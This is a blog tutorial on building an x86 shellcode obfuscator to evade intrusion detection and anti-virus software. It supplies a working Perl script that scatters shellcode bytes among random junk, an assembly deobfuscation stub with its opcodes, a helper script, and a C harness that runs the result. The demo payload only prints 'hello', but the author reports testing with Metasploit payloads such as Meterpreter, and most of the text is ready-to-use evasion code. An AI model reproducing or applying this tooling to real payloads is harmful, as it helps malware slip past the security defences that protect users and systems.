1. Introduction
This article aims to provide you with the different steps needed to develop shellcode obfuscation techniques, and their respective deobfuscator assembly stubs. This should help you to learn a bit more about IDS and Anti-Virus evasion techniques, and more than that, to give you a useful template to create more advanced obfuscations stuffs.
Don’t be confused, we are not talking about shellcode “encoders” since we do neither modify the opcodes nor remove any bad characters. We will just hide the shellcode and – hopefully – break common shellcode patterns. It means that your initial shellcode must already be NULL free or some.
While obfuscating (or encoding) a shellcode with your own method will not help you to bypass all anti-virus software (thanks to sandbox-based AV), it is a useful step to achieve it (but this discussion is out of scope for the moment).
There are 3 main parts in this development:
- Obfuscate the Shellcode with a Perl script (or any other language). The result will print a shellcode in C syntax.
- Write the assembly stub, able to reverse the shellcode in its initial state, and start it.
- Tune the stub to make it reusable and put everything together.
1.2. Requirements:
- A computer with an Operating System.
- Basic C/C++ knowledge.
- Scripting knowledge such as Perl, Ruby, Python …
- Basic Shellcode understandings.
- A bit of Assembly knowledge or enough of motivation to break the ice.
2. Shellcode scrambling method (one over 0xffffffff)
The following picture illustrates the way we’ve obfuscated our Shellcode. We keep it simple for demonstration purpose.
Junk bytes have been introduced between each byte of the initial shellcode, and the junk length is random too.
In order to be able to retrieve the location of the initial bytes at run-time (and so rebuild the initial shellcode), the junk length is stored right after the shellcode bytes as you can see in the previous picture.
The pros:
- No way to recognize the initial shellcode since the bytes are totally flooded over a bunch of bytes, at random distances.
- Easy to implement.
The cons:
- The size of the new shellcode.
As usual, the final Shellcode will looks like this: { STUB } {OBFUSCATED SHELLCODE}
3. Practice
3.1. The obfuscation part
As previously written, we have developed a Perl script to generate the obfuscated version of the Shellcode. Feel free to use any other language if you are not familiar with Perl.
This is just a first version of the script which will print out the obfuscated version of the Shellcode, based on the rule explained above (see the previous picture). In a later step, we will adapt this script to insert (and tune) the assembly stub to the final shellcode, and permit its deobfuscation..
#!/usr/bin/perl -w # ---------- # obf1.pl # ---------- use strict; # simple shellcode (print 'hello') my $buf = "\xeb\x19\x31\xc0\x31\xdb\x31\xd2\x31\xc9\xb0\x04\xb3\x01" . "\x59\xb2\x05\xcd\x80\x31\xc0\xb0\x01\x31\xdb\xcd\x80\xe8" . "\xe2\xff\xff\xff\x68\x65\x6c\x6c\x6f"; #========================== CODE ============================= my $buf_length = do{length $buf}; # convert buf string into an array my @buf_array = unpack 'a' x length $buf, $buf; # random pool my @rnd_steps=(1,2,3); my @chars=('a'..'z','A'..'Z','0'..'9','_'); # final shellcode my $final = ""; # init pseudo rnd generator my $rnd=0; srand(time); # start obfuscation for(my $i=0; $i< $buf_length ; $i++){ # copy good shellcode byte into final buffer $final .= chr(ord($buf_array[$i])); # get random from @rnd_step $rnd = $rnd_steps[rand @rnd_steps]; # append random number after the SC byte $final .= pack('c', $rnd); # add 'random - 1' junk bytes for(my $p=1; $p < $rnd; $p++){ $final .= $chars[rand @chars]; # RND } } # print final shellcode in C language print "// NEW SHELLCODE\n"; print "unsigned char buf[] = "; my $hex = unpack('H*', $final); for (my $i = 0; $i < length $hex; $i+=2) { if($i % 15 eq 0){ if($i eq 0) {print "\n\"";} else {print "\"\n\"";} } print "\\x" . substr $hex, $i, 2; } print "\";\n\n"; # print shellcode length (optional) print "unsigned int buf_len = ". do{length $final} . ";\n";
Lets try:
[user@linux]$ ./obf1.pl
// NEW SHELLCODE unsigned char buf[] = "\xeb\x02\x33\x19\x01\x31\x03\x4f\x6e\xc0\x02\x48\x31\x01\xdb" "\x02\x34\x31\x03\x53\x47\xd2\x03\x70\x56\x31\x01\xc9\x02\x48" "\xb0\x02\x5f\x04\x01\xb3\x02\x68\x01\x02\x63\x59\x03\x6a\x4d" "\xb2\x01\x05\x03\x76\x70\xcd\x02\x56\x80\x01\x31\x03\x33\x7a" "\xc0\x02\x53\xb0\x03\x62\x52\x01\x01\x31\x02\x50\xdb\x02\x6d" "\xcd\x01\x80\x01\xe8\x01\xe2\x02\x75\xff\x03\x67\x47\xff\x01" "\xff\x01\x68\x02\x76\x65\x03\x5a\x45\x6c\x02\x53\x6c\x02\x4f" "\x6f\x01"; unsigned int buf_len = 107;
As you can see:
- the first byte is a valid shellcode byte (\xeb)
- the second byte is the junk length before the next valid byte, and is chosen randomly (\x02)
- the third byte is a random junk byte
- the fourth byte is the second valid byte (\x19)
- …
3.2. The deobfuscation stub
This section is probably a bit more interesting. Here we will manage the deobfuscation of the shellcode at run-time by writing a small assembly code.
;enc2.asm [SECTION .text] global _start _start: jmp short ender ; push SC addre on the stack (MY_JMP_ENDER) starter: xor eax, eax ; clean up the registers xor ebx, ebx xor edx, edx xor ecx, ecx pop edx ; get addr of shellcode (jmp short ender) push edx mov esi, edx ; set SC addr mov edi, edx ; set SC addr inc esi ; point to the first dst position inc edi ; point to the first rnd mov cl, 200 ; tmp loop counter (MY_CNT) myloop: xor eax, eax xor ebx, ebx mov al, byte [edi] ; read distance to next byte add eax, edi ; eax = addr of the next valid byte mov bl, byte [eax] ; bl = next valid byte of the shellcode mov byte [esi], bl ; move it to the final position mov edi, eax ; inc edi ; edi = next distance inc esi ; esi = next position for a valid byte loop myloop ; loop done: pop ecx ; call shellcode call ecx ; xor eax, eax ; exit the shellcode (if it returns) mov al, 1 ; xor ebx,ebx ; int 0x80 ; ender: call starter ; put the address of the string on the stack ;db THE_OBFUSCATED_SHELLCODE
Some explanations:
In starter section, we are resetting the registers, put the address of the shellcode into EDX, initiate ESI and EDI which will later be used to navigate and modify the shellcode, and set ECX to (for the moment) a random value (ECX is the loop counter). ECX will have to hold the real length of the initial shellcode, and will be updated later by the Perl script.
In myloop section, we simply parse the obfuscated shellcode, and move back the valid bytes to their initial positions.
In done section, we jump to the address of the shellcode.
ender section is the usual way to push the address of the shellcode onto the stack. During the call starter instruction, EIP register will be pushed on the top of the stack and will contains the address of the next instruction (which will be the first instruction of the shellcode).
Let’s compile our stub. Here we use nasm under Linux, but the stub will of course works under Windows too. After that, we dump the opcodes and check that everything is as expected.
[user@linux]$ nasm -f elf enc2.asm [user@linux]$ ld -o enc2 enc2.o [user@linux]$ objdump -d enc2
enc2: file format elf32-i386 Disassembly of section .text: 08048060 <_start>: 8048060: eb 2f jmp 8048091 <ender> 08048062 <starter>: 8048062: 31 c0 xor %eax,%eax 8048064: 31 db xor %ebx,%ebx 8048066: 31 d2 xor %edx,%edx 8048068: 31 c9 xor %ecx,%ecx 804806a: 5a pop %edx 804806b: 52 push %edx 804806c: 89 d6 mov %edx,%esi 804806e: 89 d7 mov %edx,%edi 8048070: 46 inc %esi 8048071: 47 inc %edi 8048072: b1 c8 mov $0xc8,%cl 08048074 <myloop>: 8048074: 31 c0 xor %eax,%eax 8048076: 31 db xor %ebx,%ebx 8048078: 8a 07 mov (%edi),%al 804807a: 01 f8 add %edi,%eax 804807c: 8a 18 mov (%eax),%bl 804807e: 88 1e mov %bl,(%esi) 8048080: 89 c7 mov %eax,%edi 8048082: 47 inc %edi 8048083: 46 inc %esi 8048084: e2 ee loop 8048074 <myloop> 08048086 <done>: 8048086: 59 pop %ecx 8048087: ff d1 call *%ecx 8048089: 31 c0 xor %eax,%eax 804808b: b0 01 mov $0x1,%al 804808d: 31 db xor %ebx,%ebx 804808f: cd 80 int $0x80 08048091 <ender>: 8048091: e8 cc ff ff ff call 8048062 <starter>
It is time to build the opcodes list (same as for a usual shellcode). I wrote this dirty AWK script, but choose the way you prefer.
#!/bin/sh # convert-sc.sh objdump -d $1 | awk -F '\t' '{printf $2}' | \ awk 'BEGIN { cnt=0; print; printf "unsigned char buf[]=\n\""} { x=0; while(x<NF){ if(x % 15 == 0 && x !=0){ printf "\"\n\""} printf "\\x"$(x+1); x++; cnt++ } print "\";\n\nLength: "cnt }'
Then, we run it like this:
[user@linux]$ ./convert-sc.sh enc2 unsigned char buf[]= "\xeb\x2f\x31\xc0\x31\xdb\x31\xd2\x31\xc9\x5a\x52\x89\xd6\x89" "\xd7\x46\x47\xb1\xc8\x31\xc0\x31\xdb\x8a\x07\x01\xf8\x8a\x18" "\x88\x1e\x89\xc7\x47\x46\xe2\xee\x59\xff\xd1\x31\xc0\xb0\x01" "\x31\xdb\xcd\x80\xe8\xcc\xff\xff\xff"; Length: 54
Please welcome our new stub.
3.3. Tuning the assembly STUB
Great, we have our deobfucation code (section 3.2), ready to be prefixed to our obfuscated shellcode (section 3.1).
But, wait … We still need to update the loop counter (ECX) to the length of the initial shellcode.
3.3.1 Updating the counter loop (ECX)
We need to update the line 17 with the respective length of the initial shellcode.
Disassembly of section .text: 08048060 <_start>: 8048060: eb 2f jmp 8048091 <ender> 08048062 <starter>: 8048062: 31 c0 xor %eax,%eax 8048064: 31 db xor %ebx,%ebx 8048066: 31 d2 xor %edx,%edx 8048068: 31 c9 xor %ecx,%ecx 804806a: 5a pop %edx 804806b: 52 push %edx 804806c: 89 d6 mov %edx,%esi 804806e: 89 d7 mov %edx,%edi 8048070: 46 inc %esi 8048071: 47 inc %edi 8048072: b1 c8 mov $0xc8,%cl 08048074 <myloop>: 8048074: 31 c0 xor %eax,%eax 8048076: 31 db xor %ebx,%ebx 8048078: 8a 07 mov (%edi),%al 804807a: 01 f8 add %edi,%eax 804807c: 8a 18 mov (%eax),%bl 804807e: 88 1e mov %bl,(%esi) 8048080: 89 c7 mov %eax,%edi 8048082: 47 inc %edi 8048083: 46 inc %esi 8048084: e2 ee loop 8048074 <myloop> 08048086 <done>: 8048086: 59 pop %ecx 8048087: ff d1 call *%ecx 8048089: 31 c0 xor %eax,%eax 804808b: b0 01 mov $0x1,%al 804808d: 31 db xor %ebx,%ebx 804808f: cd 80 int $0x80 08048091 <ender>: 8048091: e8 cc ff ff ff call 8048062 <starter>
Since we’d like to avoid NULL byte into our stub, we can’t use instructions such as:
mov ECX, 178
since it will produce null bytes. ex:
8048072: b9 b2 00 00 00 mov $0xb2,%ecx
It makes sense that we need to use a 8 bits move like:
mov CL, 178
which is produce the opcodes \xb1 and \xb2 as seen below:
8048072: b1 b2 mov $0xb2,%cl
However, if the shellcode length is greater than 255, we must move it into a 16 bits register like:
mov CX, 278
which produce the following opcodes:
8048072: 66 b9 16 01 mov $0x116,%cx
As you see, we need four opcodes to update CX register, instead of two to update CL. Is it a problem ? Kind of. The length of the stub is therefore modified and the relative addresses used within JMP and CALL instructions have to be updated too.
3.3.2. Updating JMP and CALL addresses
As explained in the previous section, lines 4 and 40 contain relative addresses which will change based on the length of the stub.
Disassembly of section .text: 08048060 <_start>: 8048060: eb 2f jmp 8048091 <ender> 08048062 <starter>: 8048062: 31 c0 xor %eax,%eax 8048064: 31 db xor %ebx,%ebx 8048066: 31 d2 xor %edx,%edx 8048068: 31 c9 xor %ecx,%ecx 804806a: 5a pop %edx 804806b: 52 push %edx 804806c: 89 d6 mov %edx,%esi 804806e: 89 d7 mov %edx,%edi 8048070: 46 inc %esi 8048071: 47 inc %edi 8048072: b1 c8 mov $0xc8,%cl 08048074 <myloop>: 8048074: 31 c0 xor %eax,%eax 8048076: 31 db xor %ebx,%ebx 8048078: 8a 07 mov (%edi),%al 804807a: 01 f8 add %edi,%eax 804807c: 8a 18 mov (%eax),%bl 804807e: 88 1e mov %bl,(%esi) 8048080: 89 c7 mov %eax,%edi 8048082: 47 inc %edi 8048083: 46 inc %esi 8048084: e2 ee loop 8048074 <myloop> 08048086 <done>: 8048086: 59 pop %ecx 8048087: ff d1 call *%ecx 8048089: 31 c0 xor %eax,%eax 804808b: b0 01 mov $0x1,%al 804808d: 31 db xor %ebx,%ebx 804808f: cd 80 int $0x80 08048091 <ender>: 8048091: e8 cc ff ff ff call 8048062 <starter>
If you do the test at home, you will see that:
- if the loop counter need a 8 bits register, then:
- line 4 = \xeb\x2f
- line 40 (two first opcodes) = \xe8\xcc
- if the loop counter need a 16 bits register, then:
- line 4 = \xeb\x31
- line 40 (two first opcodes) = \xe8\xca
3.3.3. My god, a NULL byte
A last problem that we could have, is to obfuscate a shellcode where the length is a multiple of 256. Indeed, in order to store 256 (or 512, 768, 1024, …), we need a 16bits register.
See what happen:
mov CX, 256
8048072: 66 b9 00 01 mov $0x100,%cx
=> null byte.
To fix this issue, when the length of the initial shellcode is a multiple of 256, lets add a NOP instruction (\x90) to the end of the Shellcode, and that way, remove the null byte as seen in the following output:
mov CX, 257
8048072: 66 b9 01 01 mov $0x101,%cx
4. Putting everything together
If you are still awake, here is the updated version of the Perl script, which is managing the loop, jmp and call updates.
Note that the dynamic values of the stub (MOV ECX, JMP and CALL) have been replaced by standards strings, and are updated at runtime by the Perl script.
The changes have been highlighted.
#!/usr/bin/perl -w # --------- # obf2.pl # --------- use strict; # simple shellcode (print 'hello') my $buf = "\xeb\x19\x31\xc0\x31\xdb\x31\xd2\x31\xc9\xb0\x04\xb3\x01" . "\x59\xb2\x05\xcd\x80\x31\xc0\xb0\x01\x31\xdb\xcd\x80\xe8" . "\xe2\xff\xff\xff\x68\x65\x6c\x6c\x6f"; #========================== CODE ============================= my $mydecoder = "MY_JMP_ENDER" . "\x31\xc0\x31\xdb\x31\xd2\x31\xc9\x5a\x52\x89\xd6\x89\xd7\x46\x47" . "MY_CNT" . "\x31\xc0\x31\xdb\x8a\x07\x01\xf8\x8a\x18\x88\x1e\x89\xc7\x47\x46\xe2\xee" . "\x59\xff\xd1\x31\xc0\xb0\x01\x31\xdb\xcd\x80" . "MY_JMP_STARTER" . "\xff\xff\xff"; my $buf_length = do{length $buf}; print "// initial Shellcode length: " . $buf_length . "\n\n"; # IF buf_length is a multiple of 256, we will get NULL bytes whitin MY_CNT. # so, just add a NOP instruction at the end if($buf_length % 256 eq 0 ){ print "// length is a multiple of '256'. Add a NOP."; $buf .= "\x90"; } # Update decoder values my $mov_cl = "\xb1"; # loop counters <= 8bits my $mov_cx = "\x66\xb9"; # loop counter > 8bits my $jmp_ender_8bits = "\xeb\x2f"; # jmp ender (<= 8bits) my $jmp_ender_16bits = "\xeb\x31"; # jmp ender (> 8bits) my $jmp_starter_8bits = "\xe8\xcc"; # jmp starter (<= 8bits) my $jmp_starter_16bits = "\xe8\xca"; # jmp starter (> 8bits) if($buf_length < 256 ){ # set ECX counter $mov_cl .= pack('W', int($buf_length)); $mydecoder =~ s/MY_CNT/$mov_cl/; # replace JMP $mydecoder =~ s/MY_JMP_ENDER/$jmp_ender_8bits/; $mydecoder =~ s/MY_JMP_STARTER/$jmp_starter_8bits/; }else{ # set ECX counter $mov_cx .= pack('S', int($buf_length)); $mydecoder =~ s/MY_CNT/$mov_cx/; # replace JMP $mydecoder =~ s/MY_JMP_ENDER/$jmp_ender_16bits/; $mydecoder =~ s/MY_JMP_STARTER/$jmp_starter_16bits/; } # convert buf string into an array my @buf_array = unpack 'a' x length $buf, $buf; # random pool my @rnd_steps=(1,2,3); my @chars=('a'..'z','A'..'Z','0'..'9','_'); # final shellcode my $final = ""; # init pseudo rnd generator my $rnd=0; srand(time); # start obfuscation for(my $i=0; $i< $buf_length ; $i++){ # copy good shellcode byte into final buffer $final .= chr(ord($buf_array[$i])); # get random from @rnd_step $rnd = $rnd_steps[rand @rnd_steps]; # append random number after the SC byte $final .= pack('c', $rnd); # add 'random - 1' junk bytes for(my $p=1; $p < $rnd; $p++){ $final .= $chars[rand @chars]; # RND } } # prefix shellcode with the decoder $final = $mydecoder . $final ; # print final shellcode in C language print "// STUB + SHELLCODE\n"; print "unsigned char buf[] = "; my $hex = unpack('H*', $final); for (my $i = 0; $i < length $hex; $i+=2) { if($i % 15 eq 0){ if($i eq 0) {print "\n\"";} else {print "\"\n\"";} } print "\\x" . substr $hex, $i, 2; } print "\";\n\n"; # print shellcode length (optional) print "unsigned int buf_len = ". do{length $final} . ";\n";
The final shellcode is now:
// STUB + SHELLCODE unsigned char buf[] = "\xeb\x2f\x31\xc0\x31\xdb\x31\xd2\x31\xc9\x5a\x52\x89\xd6\x89" "\xd7\x46\x47\xb1\x25\x31\xc0\x31\xdb\x8a\x07\x01\xf8\x8a\x18" "\x88\x1e\x89\xc7\x47\x46\xe2\xee\x59\xff\xd1\x31\xc0\xb0\x01" "\x31\xdb\xcd\x80\xe8\xcc\xff\xff\xff\xeb\x03\x36\x4d\x19\x03" "\x48\x4b\x31\x03\x4d\x75\xc0\x02\x55\x31\x02\x48\xdb\x03\x72" "\x66\x31\x03\x71\x68\xd2\x01\x31\x03\x76\x70\xc9\x03\x6f\x77" "\xb0\x01\x04\x02\x58\xb3\x02\x54\x01\x02\x6d\x59\x03\x6e\x34" "\xb2\x03\x37\x74\x05\x02\x33\xcd\x02\x72\x80\x03\x52\x52\x31" "\x01\xc0\x03\x33\x31\xb0\x02\x6c\x01\x01\x31\x01\xdb\x02\x50" "\xcd\x03\x5a\x6f\x80\x02\x6a\xe8\x01\xe2\x01\xff\x03\x38\x4c" "\xff\x03\x65\x4f\xff\x01\x68\x02\x78\x65\x03\x75\x53\x6c\x02" "\x31\x6c\x03\x4d\x44\x6f\x03\x73\x64"; unsigned int buf_len = 174;
5. Testing the new shellcode
We’ve made some tests with various Metasploit payloads (Meterpreter, DialogBox, Cmd, ..) to ensure the reliability of the produced shellcode. But to preserve your bandwidth, we will limit the demonstration to this simple “Hello” shellcode, used throughout this article, and generated in the previous section.
/*************/ /* sc-test.c */ /*************/ // STUB+ SHELLCODE unsigned char buf[] = "\xeb\x2f\x31\xc0\x31\xdb\x31\xd2\x31\xc9\x5a\x52\x89\xd6\x89" "\xd7\x46\x47\xb1\x25\x31\xc0\x31\xdb\x8a\x07\x01\xf8\x8a\x18" "\x88\x1e\x89\xc7\x47\x46\xe2\xee\x59\xff\xd1\x31\xc0\xb0\x01" "\x31\xdb\xcd\x80\xe8\xcc\xff\xff\xff\xeb\x03\x36\x4d\x19\x03" "\x48\x4b\x31\x03\x4d\x75\xc0\x02\x55\x31\x02\x48\xdb\x03\x72" "\x66\x31\x03\x71\x68\xd2\x01\x31\x03\x76\x70\xc9\x03\x6f\x77" "\xb0\x01\x04\x02\x58\xb3\x02\x54\x01\x02\x6d\x59\x03\x6e\x34" "\xb2\x03\x37\x74\x05\x02\x33\xcd\x02\x72\x80\x03\x52\x52\x31" "\x01\xc0\x03\x33\x31\xb0\x02\x6c\x01\x01\x31\x01\xdb\x02\x50" "\xcd\x03\x5a\x6f\x80\x02\x6a\xe8\x01\xe2\x01\xff\x03\x38\x4c" "\xff\x03\x65\x4f\xff\x01\x68\x02\x78\x65\x03\x75\x53\x6c\x02" "\x31\x6c\x03\x4d\x44\x6f\x03\x73\x64"; int main(int argc, char **argv){ int (*func)(); func = (int (*)()) buf; (int)(*func)(); }
Compile sc-test.c and run it:
[user@linux]$ gcc -o sc-test sc-test.c [user@linux]$ ./sc-test hello [user@linux]$
Great! Let’s print Hello over the world !
Hope you enjoy.
Note: There is a rating embedded within this post, please visit this post to rate it.© 2011 – 2012, foip. All rights reserved.